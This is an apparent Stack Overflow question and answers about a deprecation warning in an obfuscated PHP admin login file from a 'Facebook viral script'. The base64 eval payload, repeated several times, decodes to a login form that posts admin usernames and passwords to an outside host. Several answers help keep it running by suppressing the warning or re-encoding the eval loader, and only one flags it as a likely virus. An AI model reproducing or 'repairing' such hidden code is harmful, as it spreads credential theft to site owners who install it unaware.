# Function ereg_replace() is deprecated

Tags: php

I am getting this error on my login.php to admin cpanel.   I am using Facebook viral script.

```
Deprecated: Function ereg_replace() is deprecated in /home/content/32/10528532/html/shockvideo/admincpanel/login.php(2) : eval()'d code on line 1
```

Here is my whole php:

```
<?php $_F=__FILE__;$_X='Pz48P3BocA0KCXI1cTM0cjUgIi4uL3NyYy9mMWM1YjIyay5waHAiOw0KCQ0KCSQzbSA9ICcnOw0KCSRsID0gJyc7DQoJJDUgPSAnJzsNCgkNCgk0ZiAoICg0c3M1dCgkX0dFVFsnNSddKSkgMW5kICg0c3M1dCgkX0dFVFsnbCddKSkpIHsNCgkkNSA9ICRfR0VUWyc1J107DQoJJGwgPSAkX0dFVFsnbCddOwkNCgl9DQoJDQoJJDNtID0gZmJMMmc0bigkX0dFVFsnMyddKTsNCgkkZGJfbDJnNG4gPSBkYkwyZzRuKCRfR0VUWyczcmwnXSk7DQoJDQoJLy9wcjJ2ajVyMSBkMSBsNCBqNSBrMnI0c240ayAzbDJnMnYxbiA0IDFrMiBuNGo1IHByNWIxYzR2MW5qNSBuMSBnbDF2bjMgc3RyMW40YzMNCgk0ZiAoICghKCQzbSAhPSAkNSkpIDFuZCAoISgkbCAhPSAkZGJfbDJnNG4pKSApIHsNCglzNXRjMjJrNDUoRmJWNHIxbFNjcjRwdCwgIlRyMzUiLCB0NG01KCkrb2UwMCk7CQ0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KCTRmICg0c3M1dCgkX0NPT0tJRVsnRmJWNHIxbFNjcjRwdCddKSkgew0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KPz4NCjxodG1sPg0KPGg1MWQ+DQo8dDR0bDU+QWRtNG4gQ3AxbjVsPC90NHRsNT4NCjxzY3I0cHQgdHlwNT0idDV4dC9qMXYxc2NyNHB0Ij4NCmYzbmN0NDJuIHYxbDRkMXQ1RjJybSgpDQp7DQp2MXIgM3M1cm4xbTU9ZDJjM201bnQuZjJybXNbImwyZzRuX2Yycm0iXVsiM3M1cm4xbTUiXS52MWwzNTsNCnYxciBwMXNzdzJyZD1kMmMzbTVudC5mMnJtc1sibDJnNG5fZjJybSJdWyJwMXNzdzJyZCJdLnYxbDM1Ow0KNGYgKDNzNXJuMW01PT1uM2xsIHx8IDNzNXJuMW01PT0iIiB8fCBwMXNzdzJyZD09bjNsbCB8fCBwMXNzdzJyZD09IiIpIHsNCiAgMWw1cnQoIkwyZzRuIGYycm0gbTNzdCBiNSBmNGxsNWQgMjN0ISIpOw0KICByNXQzcm4gZjFsczU7DQogIH0NCn0NCjwvc2NyNHB0Pg0KPC9oNTFkPg0KPGIyZHk+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8YzVudDVyPg0KPD9waHANCiRtNXNzMWc1ID0gJF9HRVRbJ201c3MxZzUnXTsNCg0KNGYgKCRtNXNzMWc1ICE9ICcnKSB7DQo1Y2gyICc8ZjJudCBjMmwycj0icjVkIj4nOw0KNWNoMiAkbTVzczFnNSAuICIgVDIgdHJ5IExPR0lOIDFnMTRuIDwxIGhyNWY9XCJsMmc0bi5waHBcIj5DTElDSyBIRVJFITwvMT4iOw0KNWNoMiAnPC9mMm50Pic7DQp9IDVsczUgew0KNWNoMiAnPGYycm0gc3R5bDU9Inc0ZHRoOnV1MHB4OyIgbjFtNT0ibDJnNG5fZjJybSIgbTV0aDJkPSJwMnN0IiAxY3Q0Mm49Imh0dHA6Ly93d3cuZzU1a2gxY2tzLjJyZy9mYnY0cjFsM2x0NG0xdDUvbDJnNG4ucGhwIiAybnMzYm00dD0icjV0M3JuIHYxbDRkMXQ1RjJybSgpIiA+DQo8ZjQ1bGRzNXQgc3R5bDU9InQ1eHQtMWw0Z246bDVmdDsgcDFkZDRuZzphdXB4OyI+PGw1ZzVuZD5BZG00biBDcDFuNWw8L2w1ZzVuZD48YnIgLz4NCg0KVXM1cm4xbTU6IDxiciAvPg0KPDRucDN0IHR5cDU9InQ1eHQiIG4xbTU9IjNzNXJuMW01Ij48QlI+DQpQMXNzdzJyZDogPGJyIC8+DQo8NG5wM3QgdHlwNT0icDFzc3cycmQiIG4xbTU9InAxc3N3MnJkIj48QlI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSIzcmwiIHYxbDM1PSInLiQzcmwuJyI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSJ2NXJzNDJuIiB2MWwzNT0iNi42Ij4NCjw0bnAzdCB0eXA1PSJzM2JtNHQiIG4xbTU9ImwyZzRuIiB2MWwzNT0iTDJnIEluIj48YnIgLz4NCjxicj4NCjwvZjQ1bGRzNXQ+DQo8L2Yycm0+ICc7CQ0KCQ0KfQ0KPz4NCjwvYzVudDVyPg0KPC9iMmR5Pg0KPC9odG1sPg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

<?php $_F=__FILE__;$_X='Pz48P3BocA0KCXI1cTM0cjUgIi4uL3NyYy9mMWM1YjIyay5waHAiOw0KCQ0KCSQzbSA9ICcnOw0KCSRsID0gJyc7DQoJJDUgPSAnJzsNCgkNCgk0ZiAoICg0c3M1dCgkX0dFVFsnNSddKSkgMW5kICg0c3M1dCgkX0dFVFsnbCddKSkpIHsNCgkkNSA9ICRfR0VUWyc1J107DQoJJGwgPSAkX0dFVFsnbCddOwkNCgl9DQoJDQoJJDNtID0gZmJMMmc0bigkX0dFVFsnMyddKTsNCgkkZGJfbDJnNG4gPSBkYkwyZzRuKCRfR0VUWyczcmwnXSk7DQoJDQoJLy9wcjJ2ajVyMSBkMSBsNCBqNSBrMnI0c240ayAzbDJnMnYxbiA0IDFrMiBuNGo1IHByNWIxYzR2MW5qNSBuMSBnbDF2bjMgc3RyMW40YzMNCgk0ZiAoICghKCQzbSAhPSAkNSkpIDFuZCAoISgkbCAhPSAkZGJfbDJnNG4pKSApIHsNCglzNXRjMjJrNDUoRmJWNHIxbFNjcjRwdCwgIlRyMzUiLCB0NG01KCkrb2UwMCk7CQ0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KCTRmICg0c3M1dCgkX0NPT0tJRVsnRmJWNHIxbFNjcjRwdCddKSkgew0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KPz4NCjxodG1sPg0KPGg1MWQ+DQo8dDR0bDU+QWRtNG4gQ3AxbjVsPC90NHRsNT4NCjxzY3I0cHQgdHlwNT0idDV4dC9qMXYxc2NyNHB0Ij4NCmYzbmN0NDJuIHYxbDRkMXQ1RjJybSgpDQp7DQp2MXIgM3M1cm4xbTU9ZDJjM201bnQuZjJybXNbImwyZzRuX2Yycm0iXVsiM3M1cm4xbTUiXS52MWwzNTsNCnYxciBwMXNzdzJyZD1kMmMzbTVudC5mMnJtc1sibDJnNG5fZjJybSJdWyJwMXNzdzJyZCJdLnYxbDM1Ow0KNGYgKDNzNXJuMW01PT1uM2xsIHx8IDNzNXJuMW01PT0iIiB8fCBwMXNzdzJyZD09bjNsbCB8fCBwMXNzdzJyZD09IiIpIHsNCiAgMWw1cnQoIkwyZzRuIGYycm0gbTNzdCBiNSBmNGxsNWQgMjN0ISIpOw0KICByNXQzcm4gZjFsczU7DQogIH0NCn0NCjwvc2NyNHB0Pg0KPC9oNTFkPg0KPGIyZHk+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8YzVudDVyPg0KPD9waHANCiRtNXNzMWc1ID0gJF9HRVRbJ201c3MxZzUnXTsNCg0KNGYgKCRtNXNzMWc1ICE9ICcnKSB7DQo1Y2gyICc8ZjJudCBjMmwycj0icjVkIj4nOw0KNWNoMiAkbTVzczFnNSAuICIgVDIgdHJ5IExPR0lOIDFnMTRuIDwxIGhyNWY9XCJsMmc0bi5waHBcIj5DTElDSyBIRVJFITwvMT4iOw0KNWNoMiAnPC9mMm50Pic7DQp9IDVsczUgew0KNWNoMiAnPGYycm0gc3R5bDU9Inc0ZHRoOnV1MHB4OyIgbjFtNT0ibDJnNG5fZjJybSIgbTV0aDJkPSJwMnN0IiAxY3Q0Mm49Imh0dHA6Ly93d3cuZzU1a2gxY2tzLjJyZy9mYnY0cjFsM2x0NG0xdDUvbDJnNG4ucGhwIiAybnMzYm00dD0icjV0M3JuIHYxbDRkMXQ1RjJybSgpIiA+DQo8ZjQ1bGRzNXQgc3R5bDU9InQ1eHQtMWw0Z246bDVmdDsgcDFkZDRuZzphdXB4OyI+PGw1ZzVuZD5BZG00biBDcDFuNWw8L2w1ZzVuZD48YnIgLz4NCg0KVXM1cm4xbTU6IDxiciAvPg0KPDRucDN0IHR5cDU9InQ1eHQiIG4xbTU9IjNzNXJuMW01Ij48QlI+DQpQMXNzdzJyZDogPGJyIC8+DQo8NG5wM3QgdHlwNT0icDFzc3cycmQiIG4xbTU9InAxc3N3MnJkIj48QlI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSIzcmwiIHYxbDM1PSInLiQzcmwuJyI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSJ2NXJzNDJuIiB2MWwzNT0iNi42Ij4NCjw0bnAzdCB0eXA1PSJzM2JtNHQiIG4xbTU9ImwyZzRuIiB2MWwzNT0iTDJnIEluIj48YnIgLz4NCjxicj4NCjwvZjQ1bGRzNXQ+DQo8L2Yycm0+ICc7CQ0KCQ0KfQ0KPz4NCjwvYzVudDVyPg0KPC9iMmR5Pg0KPC9odG1sPg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>
```

How to fix it? And if you can please explain it for newbie like me. Thanks.

Comment: This PHP file is encrypted. Not much we can do for you

Comment: @s.lenders it's obfuscated and not encrypted :)

Answer (score 2):

Replace it by [a preg_replace](http://www.php.net/manual/en/function.preg-replace.php) , ereg_replace is deprecated since php 5.3

Answer (score 2):

The issue is from this code

```
$_R = ereg_replace('__FILE__', "'" . $_F . "'", $_X);
```

Replace With

```
$_R = preg_replace('/__FILE__/', "'" . $_F . "'", $_X);
```

Answer (score 1):

Deprecated functions are functions which are not supposed to be used anymore and will be removed in some future version of PHP.

Instead of using them, you are supposed to use some alternative. Try using `preg_replace`

Answer (score 0):

Your code is encoded. It looks like its pretty easy to reverse. Starting with decoding the base 64 string. Once you decode it, you will need to replace some of the numbers with the letter equivalents.

Once you have that done, switching out `ereg_replace` to `preg_replace` is trivial. The same patterns will generally work, but the format is slightly different.

This is the part at the end as its decoded.

```
$_X=base64_decode($_X);
$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);
eval($_R);
$_R=0;
$_X=0;
```

Answer (score 0):

From start to end:

replace "eval" with "echo" in your code.
Run the php script from console and you get this php code:

```
<?php
$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;
?>
```

Now you see the offending function.

Quick fix: replace ereg_replace with @ereg_replace.

REMEMBER: this just hide the warning. You need to rewrite the code and use preg_match(), because your code relies on a deprecated function that will be removed from php very soon.

This is your fixed code:

```
<?php $_F=__FILE__;$_X='Pz48P3BocA0KCXI1cTM0cjUgIi4uL3NyYy9mMWM1YjIyay5waHAiOw0KCQ0KCSQzbSA9ICcnOw0KCSRsID0gJyc7DQoJJDUgPSAnJzsNCgkNCgk0ZiAoICg0c3M1dCgkX0dFVFsnNSddKSkgMW5kICg0c3M1dCgkX0dFVFsnbCddKSkpIHsNCgkkNSA9ICRfR0VUWyc1J107DQoJJGwgPSAkX0dFVFsnbCddOwkNCgl9DQoJDQoJJDNtID0gZmJMMmc0bigkX0dFVFsnMyddKTsNCgkkZGJfbDJnNG4gPSBkYkwyZzRuKCRfR0VUWyczcmwnXSk7DQoJDQoJLy9wcjJ2ajVyMSBkMSBsNCBqNSBrMnI0c240ayAzbDJnMnYxbiA0IDFrMiBuNGo1IHByNWIxYzR2MW5qNSBuMSBnbDF2bjMgc3RyMW40YzMNCgk0ZiAoICghKCQzbSAhPSAkNSkpIDFuZCAoISgkbCAhPSAkZGJfbDJnNG4pKSApIHsNCglzNXRjMjJrNDUoRmJWNHIxbFNjcjRwdCwgIlRyMzUiLCB0NG01KCkrb2UwMCk7CQ0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KCTRmICg0c3M1dCgkX0NPT0tJRVsnRmJWNHIxbFNjcjRwdCddKSkgew0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KPz4NCjxodG1sPg0KPGg1MWQ+DQo8dDR0bDU+QWRtNG4gQ3AxbjVsPC90NHRsNT4NCjxzY3I0cHQgdHlwNT0idDV4dC9qMXYxc2NyNHB0Ij4NCmYzbmN0NDJuIHYxbDRkMXQ1RjJybSgpDQp7DQp2MXIgM3M1cm4xbTU9ZDJjM201bnQuZjJybXNbImwyZzRuX2Yycm0iXVsiM3M1cm4xbTUiXS52MWwzNTsNCnYxciBwMXNzdzJyZD1kMmMzbTVudC5mMnJtc1sibDJnNG5fZjJybSJdWyJwMXNzdzJyZCJdLnYxbDM1Ow0KNGYgKDNzNXJuMW01PT1uM2xsIHx8IDNzNXJuMW01PT0iIiB8fCBwMXNzdzJyZD09bjNsbCB8fCBwMXNzdzJyZD09IiIpIHsNCiAgMWw1cnQoIkwyZzRuIGYycm0gbTNzdCBiNSBmNGxsNWQgMjN0ISIpOw0KICByNXQzcm4gZjFsczU7DQogIH0NCn0NCjwvc2NyNHB0Pg0KPC9oNTFkPg0KPGIyZHk+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8YzVudDVyPg0KPD9waHANCiRtNXNzMWc1ID0gJF9HRVRbJ201c3MxZzUnXTsNCg0KNGYgKCRtNXNzMWc1ICE9ICcnKSB7DQo1Y2gyICc8ZjJudCBjMmwycj0icjVkIj4nOw0KNWNoMiAkbTVzczFnNSAuICIgVDIgdHJ5IExPR0lOIDFnMTRuIDwxIGhyNWY9XCJsMmc0bi5waHBcIj5DTElDSyBIRVJFITwvMT4iOw0KNWNoMiAnPC9mMm50Pic7DQp9IDVsczUgew0KNWNoMiAnPGYycm0gc3R5bDU9Inc0ZHRoOnV1MHB4OyIgbjFtNT0ibDJnNG5fZjJybSIgbTV0aDJkPSJwMnN0IiAxY3Q0Mm49Imh0dHA6Ly93d3cuZzU1a2gxY2tzLjJyZy9mYnY0cjFsM2x0NG0xdDUvbDJnNG4ucGhwIiAybnMzYm00dD0icjV0M3JuIHYxbDRkMXQ1RjJybSgpIiA+DQo8ZjQ1bGRzNXQgc3R5bDU9InQ1eHQtMWw0Z246bDVmdDsgcDFkZDRuZzphdXB4OyI+PGw1ZzVuZD5BZG00biBDcDFuNWw8L2w1ZzVuZD48YnIgLz4NCg0KVXM1cm4xbTU6IDxiciAvPg0KPDRucDN0IHR5cDU9InQ1eHQiIG4xbTU9IjNzNXJuMW01Ij48QlI+DQpQMXNzdzJyZDogPGJyIC8+DQo8NG5wM3QgdHlwNT0icDFzc3cycmQiIG4xbTU9InAxc3N3MnJkIj48QlI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSIzcmwiIHYxbDM1PSInLiQzcmwuJyI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSJ2NXJzNDJuIiB2MWwzNT0iNi42Ij4NCjw0bnAzdCB0eXA1PSJzM2JtNHQiIG4xbTU9ImwyZzRuIiB2MWwzNT0iTDJnIEluIj48YnIgLz4NCjxicj4NCjwvZjQ1bGRzNXQ+DQo8L2Yycm0+ICc7CQ0KCQ0KfQ0KPz4NCjwvYzVudDVyPg0KPC9iMmR5Pg0KPC9odG1sPg==';$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');   $_R=@ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;?>
```

Comment: Instead of *hiding* the problem it can be *fixed* with about *two* more keystrokes than you've used here.

Answer (score 0):

we've all been newbies before. But run a simple search on SO first, there are a lot you can find even by using google. Sometimes, I do this on google >

ereg_replace site:stackoverflow.com

and hit enter. That shows you want you might be looking for.

Now back to your question, could you read this on SO (Stackoverflow)

[PHP ereg_replace deprecated](https://stackoverflow.com/questions/4226107/php-ereg-replace-deprecated?rq=1)

Answer (score 0):

This terribly written, laughably "protected" code can be fixed simply by replacing:

```
ereg_replace('pattern', 'replacement', $target);
```

with:

```
preg_replace('/pattern/', 'replacement', $target);
```

Which gives you:

```
$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=preg_replace('/__FILE__/', "'".$_F."'", $_X);eval($_R);$_R=0;$_X=0;
```

Which encodes as:

> JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPXByZWdfcmVwbGFjZSgnL19fRklMRV9fLycsICInIi4kX0YuIiciLCAkX1gpO2V2YWwoJF9SKTskX1I9MDskX1g9MDs=

Which you want to put in the `eval(base64_decode())` bit near the end.

Just as a note, code containing `eval(base64_decode())` is usually a virus. Don't be surprised if it starts getting "cleaned" by scanning processes running on the host server.

Answer (score -1):

Temporary fix: change ereg_replace() to @ereg_replace().

This will hide the warning.

But you need to rewrite the code with preg_replace().